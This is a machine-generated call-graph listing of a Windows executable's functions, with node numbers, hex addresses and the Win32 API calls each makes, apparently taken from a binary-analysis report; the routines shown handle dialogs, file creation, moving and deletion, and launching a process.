23769->23771 23773 4e761e 23770->23773 23774 4e7615 FreeLibrary 23770->23774 23772 4e7601 23771->23772 23772->23770 23775 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23773->23775 23774->23773 23776 4e7628 23775->23776 23776->23737 23777->23754 23779->23760 23781 4ea85b 23780->23781 23782 4ea851 23780->23782 23783 4ea458 __dosmaperr 5 API calls 23781->23783 23784 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23782->23784 23783->23782 23785 4e7547 23784->23785 23785->23764 23785->23765 23791 4daee0 23792 4daeea __EH_prolog 23791->23792 23954 4c130b 23792->23954 23795 4daf18 23796 4daf2c 23796->23795 23799 4daf39 23796->23799 23800 4dafa2 23796->23800 23797 4db5cb 24019 4dcd2e 23797->24019 23803 4daf3e 23799->23803 23804 4daf75 23799->23804 23802 4db041 GetDlgItemTextW 23800->23802 23807 4dafbc 23800->23807 23802->23804 23808 4db077 23802->23808 23803->23795 23812 4cddd1 53 API calls 23803->23812 23804->23795 23813 4daf96 KiUserCallbackDispatcher 23804->23813 23805 4db5e9 SendMessageW 23806 4db5f7 23805->23806 23809 4db611 GetDlgItem SendMessageW 23806->23809 23810 4db600 SendDlgItemMessageW 23806->23810 23811 4cddd1 53 API calls 23807->23811 23814 4db08f GetDlgItem 23808->23814 23952 4db080 23808->23952 24037 4d9da4 GetCurrentDirectoryW 23809->24037 23810->23809 23819 4dafde SetDlgItemTextW 23811->23819 23820 4daf58 23812->23820 23813->23795 23817 4db0c5 SetFocus 23814->23817 23818 4db0a4 SendMessageW SendMessageW 23814->23818 23816 4db641 GetDlgItem 23821 4db65e 23816->23821 23822 4db664 SetWindowTextW 23816->23822 23823 4db0d5 23817->23823 23838 4db0ed 23817->23838 23818->23817 23824 4dafec 23819->23824 24059 4c1241 SHGetMalloc 23820->24059 23821->23822 24038 4da2c7 GetClassNameW 23822->24038 23827 4cddd1 53 API calls 23823->23827 23824->23795 23832 4daff9 GetMessageW 23824->23832 23831 4db0df 23827->23831 23828 4daf5f 23828->23795 23833 4daf63 SetDlgItemTextW 23828->23833 23829 4db56b 23834 4cddd1 53 API calls 23829->23834 24060 4dcb5a 23831->24060 23832->23795 23837 4db010 IsDialogMessageW 23832->23837 23833->23795 23839 4db57b SetDlgItemTextW 23834->23839 23837->23824 23841 4db01f TranslateMessage DispatchMessageW 23837->23841 23843 4cddd1 53 API calls 23838->23843 23842 4db58f 23839->23842 23841->23824 23844 4cddd1 53 API calls 23842->23844 23846 4db124 23843->23846 23847 4db5b8 23844->23847 23845 4db6af 23851 4db6df 23845->23851 23856 4cddd1 53 API calls 23845->23856 23852 4c400a _swprintf 51 API calls 23846->23852 23854 4cddd1 53 API calls 23847->23854 23848 4db0e6 23964 4ca04f 23848->23964 23850 4dbdf5 98 API calls 23850->23845 23858 4dbdf5 98 API calls 23851->23858 23902 4db797 23851->23902 23853 4db136 23852->23853 23857 4dcb5a 16 API calls 23853->23857 23854->23795 23862 4db6c2 SetDlgItemTextW 23856->23862 23857->23848 23867 4db6fa 23858->23867 23859 4db847 23863 4db850 EnableWindow 23859->23863 23869 4db859 23859->23869 23860 4db17f 23970 4da322 SetCurrentDirectoryW 23860->23970 23861 4db174 GetLastError 23861->23860 23865 4cddd1 53 API calls 23862->23865 23863->23869 23866 4db6d6 SetDlgItemTextW 23865->23866 23866->23851 23872 4db70c 23867->23872 23890 4db731 23867->23890 23868 4db876 23871 4db89d 23868->23871 23880 4db895 SendMessageW 23868->23880 23869->23868 24078 4c12c8 GetDlgItem EnableWindow 23869->24078 23870 4db195 23875 4db19e GetLastError 23870->23875 23876 4db1ac 23870->23876 23871->23795 23882 4cddd1 53 API calls 23871->23882 24076 4d9635 32 API calls 23872->24076 23873 4db78a 23877 4dbdf5 98 API calls 23873->23877 23875->23876 23881 4db227 23876->23881 23886 4db237 23876->23886 23887 4db1c4 GetTickCount 23876->23887 23877->23902 23879 4db86c 24079 4c12c8 GetDlgItem EnableWindow 23879->24079 23880->23871 23885 4db46c 23881->23885 23881->23886 23889 4db8b6 SetDlgItemTextW 23882->23889 23883 4db725 23883->23890 23979 4c12e6 GetDlgItem ShowWindow 23885->23979 23892 4db24f GetModuleFileNameW 23886->23892 23893 4db407 23886->23893 23894 4c400a _swprintf 51 API calls 23887->23894 23888 4db825 24077 4d9635 32 API calls 23888->24077 23889->23795 23890->23873 23897 4dbdf5 98 API calls 23890->23897 24070 4ceb3a 80 API calls 23892->24070 23893->23804 23906 4cddd1 53 API calls 23893->23906 23900 4db1dd 23894->23900 23896 4cddd1 53 API calls 23896->23902 23903 4db75f 23897->23903 23898 4db47c 23980 4c12e6 GetDlgItem ShowWindow 23898->23980 23971 4c971e 23900->23971 23901 4db844 23901->23859 23902->23859 23902->23888 23902->23896 23903->23873 23907 4db768 DialogBoxParamW 23903->23907 23905 4db275 23909 4c400a _swprintf 51 API calls 23905->23909 23910 4db41b 23906->23910 23907->23804 23907->23873 23908 4db486 23911 4cddd1 53 API calls 23908->23911 23912 4db297 CreateFileMappingW 23909->23912 23913 4c400a _swprintf 51 API calls 23910->23913 23915 4db490 SetDlgItemTextW 23911->23915 23916 4db2f9 GetCommandLineW 23912->23916 23947 4db376 __vsnwprintf_l 23912->23947 23917 4db439 23913->23917 23981 4c12e6 GetDlgItem ShowWindow 23915->23981 23921 4db30a 23916->23921 23930 4cddd1 53 API calls 23917->23930 23918 4db203 23922 4db215 23918->23922 23923 4db20a GetLastError 23918->23923 23919 4db381 ShellExecuteExW 23945 4db39e 23919->23945 24071 4dab2e SHGetMalloc 23921->24071 23926 4c9653 79 API calls 23922->23926 23923->23922 23924 4db4a2 SetDlgItemTextW GetDlgItem 23927 4db4bf GetWindowLongW SetWindowLongW 23924->23927 23928 4db4d7 23924->23928 23926->23881 23927->23928 23982 4dbdf5 23928->23982 23929 4db326 24072 4dab2e SHGetMalloc 23929->24072 23930->23804 23934 4db332 24073 4dab2e SHGetMalloc 23934->24073 23935 4db3e1 23935->23893 23941 4db3f7 UnmapViewOfFile CloseHandle 23935->23941 23936 4dbdf5 98 API calls 23939 4db4f3 23936->23939 23938 4db33e 24074 4cecad 80 API calls ___scrt_fastfail 23938->24074 24007 4dd0f5 23939->24007 23941->23893 23944 4db355 MapViewOfFile 23944->23947 23945->23935 23948 4db3cd Sleep 23945->23948 23946 4dbdf5 98 API calls 23951 4db519 23946->23951 23947->23919 23948->23935 23948->23945 23949 4db542 24075 4c12c8 GetDlgItem EnableWindow 23949->24075 23951->23949 23953 4dbdf5 98 API calls 23951->23953 23952->23804 23952->23829 23953->23949 23955 4c136d 23954->23955 23956 4c1314 23954->23956 24081 4cda71 GetWindowLongW SetWindowLongW 23955->24081 23957 4c137a 23956->23957 24080 4cda98 62 API calls 2 library calls 23956->24080 23957->23795 23957->23796 23957->23797 23960 4c1336 23960->23957 23961 4c1349 GetDlgItem 23960->23961 23961->23957 23962 4c1359 23961->23962 23962->23957 23963 4c135f SetWindowTextW 23962->23963 23963->23957 23967 4ca059 23964->23967 23965 4ca113 23965->23860 23965->23861 23966 4ca0ea 23966->23965 23968 4ca207 9 API calls 23966->23968 23967->23965 23967->23966 24082 4ca207 23967->24082 23968->23965 23970->23870 23972 4c9728 23971->23972 23973 4c9792 CreateFileW 23972->23973 23974 4c9786 23972->23974 23973->23974 23975 4c97e4 23974->23975 23976 4cb66c 2 API calls 23974->23976 23975->23918 23977 4c97cb 23976->23977 23977->23975 23978 4c97cf CreateFileW 23977->23978 23978->23975 23979->23898 23980->23908 23981->23924 23983 4dbdff __EH_prolog 23982->23983 23984 4db4e5 23983->23984 24114 4daa36 23983->24114 23984->23936 23987 4daa36 ExpandEnvironmentStringsW 23994 4dbe36 _wcsrchr 23987->23994 23988 4dc11d SetWindowTextW 23988->23994 23993 4dbf0b SetFileAttributesW 23995 4dbfc5 GetFileAttributesW 23993->23995 24006 4dbf25 ___scrt_fastfail 23993->24006 23994->23984 23994->23987 23994->23988 23994->23993 23999 4dc2e7 GetDlgItem SetWindowTextW SendMessageW 23994->23999 24002 4dc327 SendMessageW 23994->24002 24118 4d17ac CompareStringW 23994->24118 24119 4d9da4 GetCurrentDirectoryW 23994->24119 24121 4ca52a 7 API calls 23994->24121 24122 4ca4b3 FindClose 23994->24122 24123 4dab9a 76 API calls new 23994->24123 24124 4e35de 23994->24124 23995->23994 23998 4dbfd7 DeleteFileW 23995->23998 23998->23994 24000 4dbfe8 23998->24000 23999->23994 24001 4c400a _swprintf 51 API calls 24000->24001 24003 4dc008 GetFileAttributesW 24001->24003 24002->23994 24003->24000 24004 4dc01d MoveFileW 24003->24004 24004->23994 24005 4dc035 MoveFileExW 24004->24005 24005->23994 24006->23994 24006->23995 24120 4cb4f7 52 API calls 2 library calls 24006->24120 24008 4dd0ff __EH_prolog 24007->24008 24139 4cfead 24008->24139 24010 4dd130 24143 4c5c59 24010->24143 24012 4dd14e 24147 4c7c68 24012->24147 24016 4dd1a1 24164 4c7cfb 24016->24164 24018 4db504 24018->23946 24020 4dcd38 24019->24020 24021 4d9d1a 4 API calls 24020->24021 24022 4dcd3d 24021->24022 24023 4dcd45 GetWindow 24022->24023 24024 4db5d1 24022->24024 24023->24024 24027 4dcd65 24023->24027 24024->23805 24024->23806 24025 4dcd72 GetClassNameW 24608 4d17ac CompareStringW 24025->24608 24027->24024 24027->24025 24028 4dcdfa GetWindow 24027->24028 24029 4dcd96 GetWindowLongW 24027->24029 24028->24024 24028->24027 24029->24028 24030 4dcda6 SendMessageW 24029->24030 24030->24028 24031 4dcdbc GetObjectW 24030->24031 24609 4d9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24031->24609 24033 4dcdd3 24610 4d9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24033->24610 24611 4d9f5d 8 API calls ___scrt_fastfail 24033->24611 24036 4dcde4 SendMessageW DeleteObject 24036->24028 24037->23816 24039 4da2e8 24038->24039 24044 4da30d 24038->24044 24612 4d17ac CompareStringW 24039->24612 24041 4da31b 24046 4da7c3 24041->24046 24042 4da312 SHAutoComplete 24042->24041 24043 4da2fb 24043->24044 24045 4da2ff FindWindowExW 24043->24045 24044->24041 24044->24042 24045->24044 24047 4da7cd __EH_prolog 24046->24047 24048 4c1380 82 API calls 24047->24048 24049 4da7ef 24048->24049 24613 4c1f4f 24049->24613 24052 4da809 24055 4c1631 84 API calls 24052->24055 24053 4da818 24054 4c1951 126 API calls 24053->24054 24057 4da83a __vsnwprintf_l new 24054->24057 24056 4da814 24055->24056 24056->23845 24056->23850 24057->24056 24058 4c1631 84 API calls 24057->24058 24058->24056 24059->23828 24621 4dac74 PeekMessageW 24060->24621 24063 4dcbbc SendMessageW SendMessageW 24065 4dcbf8 24063->24065 24066 4dcc17 SendMessageW SendMessageW SendMessageW 24063->24066 24064 4dcb88 24067 4dcb93 ShowWindow SendMessageW SendMessageW 24064->24067 24065->24066 24068 4dcc6d SendMessageW 24066->24068 24069 4dcc4a SendMessageW 24066->24069 24067->24063 24068->23848 24069->24068 24070->23905 24071->23929 24072->23934 24073->23938 24074->23944 24075->23952 24076->23883 24077->23901 24078->23879 24079->23868 24080->23960 24081->23957 24083 4ca214 24082->24083 24084 4ca238 24083->24084 24085 4ca22b CreateDirectoryW 24083->24085 24103 4ca180 24084->24103 24085->24084 24087 4ca26b 24085->24087 24091 4ca27a 24087->24091 24095 4ca444 24087->24095 24089 4ca27e GetLastError 24089->24091 24091->23967 24092 4cb66c 2 API calls 24093 4ca254 24092->24093 24093->24089 24094 4ca258 CreateDirectoryW 24093->24094 24094->24087 24094->24089 24096 4de360 24095->24096 24097 4ca451 SetFileAttributesW 24096->24097 24098 4ca494 24097->24098 24099 4ca467 24097->24099 24098->24091 24100 4cb66c 2 API calls 24099->24100 24101 4ca47b 24100->24101 24101->24098 24102 4ca47f SetFileAttributesW 24101->24102 24102->24098 24106 4ca194 24103->24106 24107 4de360 24106->24107 24108 4ca1a1 GetFileAttributesW 24107->24108 24109 4ca189 24108->24109 24110 4ca1b2 24108->24110 24109->24089 24109->24092 24111 4cb66c 2 API calls 24110->24111 24112 4ca1c6 24111->24112 24112->24109 24113 4ca1ca GetFileAttributesW 24112->24113 24113->24109 24115 4daa40 24114->24115 24116 4dab16 24115->24116 24117 4daaf3 ExpandEnvironmentStringsW 24115->24117 24116->23994 24117->24116 24118->23994 24119->23994 24120->24006 24121->23994 24122->23994 24123->23994 24125 4e8606 24124->24125 24126 4e861e 24125->24126 24127 4e8613 24125->24127 24128 4e8626 24126->24128 24135 4e862f __dosmaperr 24126->24135 24129 4e8518 __onexit 21 API calls 24127->24129 24130 4e84de _free 20 API calls 24128->24130 24133 4e861b 24129->24133 24130->24133 24131 4e8659 HeapReAlloc 24131->24133 24131->24135 24132 4e8634 24137 4e895a 20 API calls __dosmaperr 24132->24137 24133->23994 24135->24131 24135->24132 24138 4e71ad 7 API calls 2 library calls 24135->24138 24137->24133 24138->24135 24140 4cfeba 24139->24140 24168 4c1789 24140->24168 24142 4cfed2 24142->24010 24144 4cfead 24143->24144 24145 4c1789 76 API calls 24144->24145 24146 4cfed2 24145->24146 24146->24012 24148 4c7c72 __EH_prolog 24147->24148 24185 4cc827 24148->24185 24150 4c7c8d 24151 4de24a new 8 API calls 24150->24151 24152 4c7cb7 24151->24152 24191 4d440b 24152->24191 24155 4c7ddf 24156 4c7de9 24155->24156 24159 4c7e53 24156->24159 24220 4ca4c6 24156->24220 24158 4c7f06 24158->24016 24160 4c7ec4 24159->24160 24163 4ca4c6 8 API calls 24159->24163 24198 4c837f 24159->24198 24160->24158 24226 4c6dc1 74 API calls 24160->24226 24163->24159 24165 4c7d09 24164->24165 24167 4c7d10 24164->24167 24166 4d1acf 84 API calls 24165->24166 24166->24167 24169 4c179f 24168->24169 24180 4c17fa __vsnwprintf_l 24168->24180 24170 4c17c8 24169->24170 24181 4c6e91 74 API calls __vswprintf_c_l 24169->24181 24172 4c1827 24170->24172 24177 4c17e7 new 24170->24177 24174 4e35de 22 API calls 24172->24174 24173 4c17be 24182 4c6efd 75 API calls 24173->24182 24176 4c182e 24174->24176 24176->24180 24184 4c6efd 75 API calls 24176->24184 24177->24180 24183 4c6efd 75 API calls 24177->24183 24180->24142 24181->24173 24182->24170 24183->24180 24184->24180 24186 4cc831 __EH_prolog 24185->24186 24187 4de24a new 8 API calls 24186->24187 24188 4cc874 24187->24188 24189 4de24a new 8 API calls 24188->24189 24190 4cc898 24189->24190 24190->24150 24192 4d4415 __EH_prolog 24191->24192 24193 4de24a new 8 API calls 24192->24193 24194 4d4431 24193->24194 24195 4c7ce6 24194->24195 24197 4d06ba 78 API calls 24194->24197 24195->24155 24197->24195 24199 4c8389 __EH_prolog 24198->24199 24227 4c1380 24199->24227 24201 4c83a4 24235 4c9ef7 24201->24235 24207 4c83d3 24358 4c1631 24207->24358 24208 4c846e 24254 4c8517 24208->24254 24211 4c84ce 24261 4c1f00 24211->24261 24215 4c83cf 24215->24207 24215->24208 24218 4ca4c6 8 API calls 24215->24218 24362 4cbac4 CompareStringW 24215->24362 24216 4c84d9 24216->24207 24265 4c3aac 24216->24265 24275 4c857b 24216->24275 24218->24215 24221 4ca4db 24220->24221 24222 4ca4df 24221->24222 24596 4ca5f4 24221->24596 24222->24156 24224 4ca4ef 24224->24222 24225 4ca4f4 FindClose 24224->24225 24225->24222 24226->24158 24228 4c1385 __EH_prolog 24227->24228 24229 4cc827 8 API calls 24228->24229 24230 4c13bd 24229->24230 24231 4de24a new 8 API calls 24230->24231 24234 4c1416 ___scrt_fastfail 24230->24234 24232 4c1403 24231->24232 24233 4cb07d 82 API calls 24232->24233 24232->24234 24233->24234 24234->24201 24236 4c9f0e 24235->24236 24237 4c83ba 24236->24237 24363 4c6f5d 76 API calls 24236->24363 24237->24207 24239 4c19a6 24237->24239 24240 4c19b0 __EH_prolog 24239->24240 24246 4c1a00 24240->24246 24250 4c19e5 24240->24250 24364 4c709d 24240->24364 24242 4c1b50 24367 4c6dc1 74 API calls 24242->24367 24244 4c3aac 97 API calls 24249 4c1bb3 24244->24249 24245 4c1b60 24245->24244 24245->24250 24246->24242 24246->24245 24246->24250 24247 4c1bff 24247->24250 24253 4c1c32 24247->24253 24368 4c6dc1 74 API calls 24247->24368 24249->24247 24251 4c3aac 97 API calls 24249->24251 24250->24215 24251->24249 24252 4c3aac 97 API calls 24252->24253 24253->24250 24253->24252 24255 4c8524 24254->24255 24386 4d0c26 GetSystemTime SystemTimeToFileTime 24255->24386 24257 4c8488 24257->24211 24258 4d1359 24257->24258 24388 4dd51a 24258->24388 24262 4c1f05 __EH_prolog 24261->24262 24263 4c1f39 24262->24263 24396 4c1951 24262->24396 24263->24216 24266 4c3abc 24265->24266 24267 4c3ab8 24265->24267 24268 4c3ae9 24266->24268 24269 4c3af7 24266->24269 24267->24216 24270 4c3b29 24268->24270 24530 4c3281 85 API calls 3 library calls 24268->24530 24531 4c27e8 97 API calls 3 library calls 24269->24531 24270->24216 24273 4c3af5 24273->24270 24532 4c204e 74 API calls 24273->24532 24276 4c8585 __EH_prolog 24275->24276 24277 4c85be 24276->24277 24289 4c85c2 24276->24289 24555 4d84bd 99 API calls 24276->24555 24278 4c85e7 24277->24278 24283 4c867a 24277->24283 24277->24289 24280 4c8609 24278->24280 24278->24289 24556 4c7b66 151 API calls 24278->24556 24280->24289 24557 4d84bd 99 API calls 24280->24557 24283->24289 24533 4c5e3a 24283->24533 24285 4c8705 24285->24289 24539 4c826a 24285->24539 24288 4c8875 24290 4ca4c6 8 API calls 24288->24290 24292 4c88e0 24288->24292 24289->24216 24290->24292 24291 4cc991 80 API calls 24297 4c893b _memcmp 24291->24297 24543 4c7d6c 24292->24543 24294 4c8a70 24295 4c8b43 24294->24295 24301 4c8abf 24294->24301 24300 4c8b9e 24295->24300 24310 4c8b4e 24295->24310 24296 4c8a69 24560 4c1f94 74 API calls 24296->24560 24297->24289 24297->24291 24297->24294 24297->24296 24558 4c8236 82 API calls 24297->24558 24559 4c1f94 74 API calls 24297->24559 24309 4c8b30 24300->24309 24563 4c80ea 96 API calls 24300->24563 24303 4ca180 4 API calls 24301->24303 24301->24309 24302 4c8b9c 24304 4c9653 79 API calls 24302->24304 24307 4c8af7 24303->24307 24304->24289 24306 4c9653 79 API calls 24306->24289 24307->24309 24561 4c9377 96 API calls 24307->24561 24308 4c8c09 24312 4c9989 GetFileType 24308->24312 24321 4c8c74 24308->24321 24356 4c91c1 ___InternalCxxFrameHandler 24308->24356 24309->24302 24309->24308 24310->24302 24562 4c7f26 100 API calls ___InternalCxxFrameHandler 24310->24562 24311 4caa88 8 API calls 24314 4c8cc3 24311->24314 24316 4c8c4c 24312->24316 24317 4caa88 8 API calls 24314->24317 24316->24321 24564 4c1f94 74 API calls 24316->24564 24330 4c8cd9 24317->24330 24319 4c8c62 24565 4c7061 75 API calls 24319->24565 24321->24311 24322 4c8d9c 24323 4c8efd 24322->24323 24324 4c8df7 24322->24324 24328 4c8f0f 24323->24328 24329 4c8f23 24323->24329 24345 4c8e27 24323->24345 24325 4c8e69 24324->24325 24327 4c8e07 24324->24327 24326 4c826a CharUpperW 24325->24326 24331 4c8e84 24326->24331 24332 4c8e4d 24327->24332 24338 4c8e15 24327->24338 24333 4c92e6 121 API calls 24328->24333 24334 4d2c42 75 API calls 24329->24334 24330->24322 24566 4c9b21 SetFilePointer GetLastError SetEndOfFile 24330->24566 24340 4c8ead 24331->24340 24341 4c8eb4 24331->24341 24331->24345 24332->24345 24568 4c7907 108 API calls 24332->24568 24333->24345 24336 4c8f3c 24334->24336 24571 4d28f1 121 API calls 24336->24571 24567 4c1f94 74 API calls 24338->24567 24569 4c7698 84 API calls ___InternalCxxFrameHandler 24340->24569 24570 4c9224 94 API calls __EH_prolog 24341->24570 24349 4c904b 24345->24349 24572 4c1f94 74 API calls 24345->24572 24347 4c9104 24550 4c9d62 24347->24550 24348 4ca444 4 API calls 24350 4c91b1 24348->24350 24349->24347 24349->24356 24357 4c9156 24349->24357 24549 4c9ebf SetEndOfFile 24349->24549 24350->24356 24573 4c1f94 74 API calls 24350->24573 24353 4c914b 24355 4c96d0 75 API calls 24353->24355 24355->24357 24356->24306 24357->24348 24357->24356 24359 4c1643 24358->24359 24588 4cc8ca 24359->24588 24362->24215 24363->24237 24369 4c16d2 24364->24369 24366 4c70b9 24366->24246 24367->24250 24368->24253 24370 4c16e8 24369->24370 24380 4c1740 __vsnwprintf_l 24369->24380 24371 4c1711 24370->24371 24382 4c6e91 74 API calls __vswprintf_c_l 24370->24382 24373 4c1767 24371->24373 24378 4c172d new 24371->24378 24375 4e35de 22 API calls 24373->24375 24374 4c1707 24383 4c6efd 75 API calls 24374->24383 24377 4c176e 24375->24377 24377->24380 24385 4c6efd 75 API calls 24377->24385 24378->24380 24384 4c6efd 75 API calls 24378->24384 24380->24366 24382->24374 24383->24371 24384->24380 24385->24380 24387 4d0c56 __vsnwprintf_l 24386->24387 24387->24257 24389 4dd527 24388->24389 24390 4cddd1 53 API calls 24389->24390 24391 4dd54a 24390->24391 24392 4c400a _swprintf 51 API calls 24391->24392 24393 4dd55c 24392->24393 24394 4dcb5a 16 API calls 24393->24394 24395 4d1372 24394->24395 24395->24211 24397 4c1961 24396->24397 24399 4c195d 24396->24399 24400 4c1896 24397->24400 24399->24263 24401 4c18a8 24400->24401 24402 4c18e5 24400->24402 24403 4c3aac 97 API calls 24401->24403 24408 4c3f18 24402->24408 24406 4c18c8 24403->24406 24406->24399 24410 4c3f21 24408->24410 24409 4c3aac 97 API calls 24409->24410 24410->24409 24412 4c1906 24410->24412 24425 4d067c 24410->24425 24412->24406 24413 4c1e00 24412->24413 24414 4c1e0a __EH_prolog 24413->24414 24433 4c3b3d 24414->24433 24416 4c1e34 24417 4c1ebb 24416->24417 24418 4c16d2 76 API calls 24416->24418 24417->24406 24419 4c1e4b 24418->24419 24461 4c1849 76 API calls 24419->24461 24421 4c1e63 24423 4c1e6f 24421->24423 24462 4d137a MultiByteToWideChar 24421->24462 24463 4c1849 76 API calls 24423->24463 24427 4d0683 24425->24427 24426 4d069e 24429 4d06af SetThreadExecutionState 24426->24429 24432 4c6e8c RaiseException __CxxThrowException@8 24426->24432 24427->24426 24431 4c6e8c RaiseException __CxxThrowException@8 24427->24431 24429->24410 24431->24426 24432->24429 24434 4c3b47 __EH_prolog 24433->24434 24435 4c3b5d 24434->24435 24436 4c3b79 24434->24436 24492 4c6dc1 74 API calls 24435->24492 24437 4c3dc2 24436->24437 24441 4c3ba5 24436->24441 24509 4c6dc1 74 API calls 24437->24509 24440 4c3b68 24440->24416 24441->24440 24464 4d2c42 24441->24464 24443 4c3c26 24444 4c3cb1 24443->24444 24460 4c3c1d 24443->24460 24495 4cc991 24443->24495 24477 4caa88 24444->24477 24445 4c3c22 24445->24443 24494 4c2034 76 API calls 24445->24494 24447 4c3bf4 24447->24443 24447->24445 24448 4c3c12 24447->24448 24493 4c6dc1 74 API calls 24448->24493 24453 4c3cc4 24454 4c3d3e 24453->24454 24455 4c3d48 24453->24455 24481 4c92e6 24454->24481 24501 4d28f1 121 API calls 24455->24501 24458 4c3d46 24458->24460 24502 4c1f94 74 API calls 24458->24502 24503 4d1acf 24460->24503 24461->24421 24462->24423 24463->24417 24465 4d2c51 24464->24465 24467 4d2c5b 24464->24467 24510 4c6efd 75 API calls 24465->24510 24468 4d2ca2 new 24467->24468 24470 4d2c9d Concurrency::cancel_current_task 24467->24470 24476 4d2cfd ___scrt_fastfail 24467->24476 24469 4d2da9 Concurrency::cancel_current_task 24468->24469 24471 4d2cd9 24468->24471 24468->24476 24513 4e157a RaiseException 24469->24513 24512 4e157a RaiseException 24470->24512 24511 4d2b7b 75 API calls 4 library calls 24471->24511 24475 4d2dc1 24476->24447 24476->24476 24478 4caa95 24477->24478 24480 4caa9f 24477->24480 24479 4de24a new 8 API calls 24478->24479 24479->24480 24480->24453 24482 4c92f0 __EH_prolog 24481->24482 24514 4c7dc6 24482->24514 24485 4c709d 76 API calls 24486 4c9302 24485->24486 24517 4cca6c 24486->24517 24488 4c935c 24488->24458 24490 4cca6c 114 API calls 24491 4c9314 24490->24491 24491->24488 24491->24490 24526 4ccc51 97 API calls __vsnwprintf_l 24491->24526 24492->24440 24493->24460 24494->24443 24496 4cc9c4 24495->24496 24497 4cc9b2 24495->24497 24528 4c6249 80 API calls 24496->24528 24527 4c6249 80 API calls 24497->24527 24500 4cc9bc 24500->24444 24501->24458 24502->24460 24504 4d1ad9 24503->24504 24505 4d1af2 24504->24505 24508 4d1b06 24504->24508 24529 4d075b 84 API calls 24505->24529 24507 4d1af9 24507->24508 24509->24440 24510->24467 24511->24476 24512->24469 24513->24475 24515 4cacf5 GetVersionExW 24514->24515 24516 4c7dcb 24515->24516 24516->24485 24523 4cca82 __vsnwprintf_l 24517->24523 24518 4ccbf7 24519 4ccc1f 24518->24519 24520 4cca0b 6 API calls 24518->24520 24521 4d067c SetThreadExecutionState RaiseException 24519->24521 24520->24519 24524 4ccbee 24521->24524 24522 4d84bd 99 API calls 24522->24523 24523->24518 24523->24522 24523->24524 24525 4cab70 89 API calls 24523->24525 24524->24491 24525->24523 24526->24491 24527->24500 24528->24500 24529->24507 24530->24273 24531->24273 24532->24270 24534 4c5e4a 24533->24534 24574 4c5d67 24534->24574 24537 4c5e7d 24538 4c5eb5 24537->24538 24579 4cad65 CharUpperW CompareStringW 24537->24579 24538->24285 24540 4c8289 24539->24540 24585 4d179d CharUpperW 24540->24585 24542 4c8333 24542->24288 24544 4c7d7b 24543->24544 24545 4c7dbb 24544->24545 24586 4c7043 74 API calls 24544->24586 24545->24297 24547 4c7db3 24587 4c6dc1 74 API calls 24547->24587 24549->24347 24551 4c9d73 24550->24551 24553 4c9d82 24550->24553 24552 4c9d79 FlushFileBuffers 24551->24552 24551->24553 24552->24553 24554 4c9dfb SetFileTime 24553->24554 24554->24353 24555->24277 24556->24280 24557->24289 24558->24297 24559->24297 24560->24294 24561->24309 24562->24302 24563->24309 24564->24319 24565->24321 24566->24322 24567->24345 24568->24345 24569->24345 24570->24345 24571->24345 24572->24349 24573->24356 24580 4c5c64 24574->24580 24576 4c5d88 24576->24537 24578 4c5c64 2 API calls 24578->24576 24579->24537 24583 4c5c6e 24580->24583 24581 4c5d56 24581->24576 24581->24578 24583->24581 24584 4cad65 CharUpperW CompareStringW 24583->24584 24584->24583 24585->24542 24586->24547 24587->24545 24589 4cc8db 24588->24589 24594 4ca90e 84 API calls 24589->24594 24591 4cc90d 24595 4ca90e 84 API calls 24591->24595 24593 4cc918 24594->24591 24595->24593 24597 4ca5fe 24596->24597 24598 4ca691 FindNextFileW 24597->24598 24599 4ca621 FindFirstFileW 24597->24599 24600 4ca69c GetLastError 24598->24600 24601 4ca6b0 24598->24601 24602 4ca638 24599->24602 24607 4ca675 24599->24607 24600->24601 24601->24607 24603 4cb66c 2 API calls 24602->24603 24604 4ca64d 24603->24604 24605 4ca66a GetLastError 24604->24605 24606 4ca651 FindFirstFileW 24604->24606 24605->24607 24606->24605 24606->24607 24607->24224 24608->24027 24609->24033 24610->24033 24611->24036 24612->24043 24614 4c9ef7 76 API calls 24613->24614 24615 4c1f5b 24614->24615 24616 4c19a6 97 API calls 24615->24616 24618 4c1f78 24615->24618 24617 4c1f68 24616->24617 24617->24618 24620 4c6dc1 74 API calls 24617->24620 24618->24052 24618->24053 24620->24618 24622 4dac8f GetMessageW 24621->24622 24623 4dacc8 GetDlgItem 24621->24623 24624 4daca5 IsDialogMessageW 24622->24624 24625 4dacb4 TranslateMessage DispatchMessageW 24622->24625 24623->24063 24623->24064 24624->24623 24624->24625 24625->24623 24805 4db8e0 93 API calls _swprintf 24806 4d8ce0 6 API calls 24809 4f16e0 CloseHandle 24630 4de1f9 24631 4de203 24630->24631 24632 4ddf59 ___delayLoadHelper2@8 19 API calls 24631->24632 24633 4de210 24632->24633 24857 4debf7 20 API calls 24709 4c1385 82 API calls 3 library calls 24860 4e5780 QueryPerformanceFrequency QueryPerformanceCounter 24813 4da89d 78 API calls 24814 4cea98 FreeLibrary 24861 4e2397 48 API calls 24720 4dd997 24721 4dd89b 24720->24721 24722 4ddf59 ___delayLoadHelper2@8 19 API calls 24721->24722 24722->24721 24723 4dd891 19 API calls ___delayLoadHelper2@8 24816 4d7090 114 API calls 24817 4dcc90 70 API calls 24862 4da990 97 API calls 24863 4d9b90 GdipCloneImage GdipAlloc 24864 4e9b90 21 API calls 2 library calls 24819 4c96a0 79 API calls 24865 4ee9a0 51 API calls 24822 4de4a2 38 API calls 2 library calls 24823 4e76bd 52 API calls 2 library calls 24868 4e79b7 55 API calls _free 24825 4c16b0 84 API calls 24745 4e90b0 24753 4ea56f 24745->24753 24748 4e90c4 24750 4e90cc 24751 4e90d9 24750->24751 24761 4e90e0 11 API calls 24750->24761 24754 4ea458 __dosmaperr 5 API calls 24753->24754 24755 4ea596 24754->24755 24756 4ea5ae TlsAlloc 24755->24756 24757 4ea59f 24755->24757 24756->24757 24758 4dec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24757->24758 24759 4e90ba 24758->24759 24759->24748 24760 4e9029 20 API calls 2 library calls 24759->24760 24760->24750 24761->24748 24762 4ea3b0 24763 4ea3bb 24762->24763 24765 4ea3e4 24763->24765 24767 4ea3e0 24763->24767 24768 4ea6ca 24763->24768 24775 4ea410 DeleteCriticalSection 24765->24775 24769 4ea458 __dosmaperr 5 API calls 24768->24769 24770 4ea6f1 24769->24770 24771 4ea70f InitializeCriticalSectionAndSpinCount 24770->24771 24772 4ea6fa 24770->24772 24771->24772 24773 4dec4a 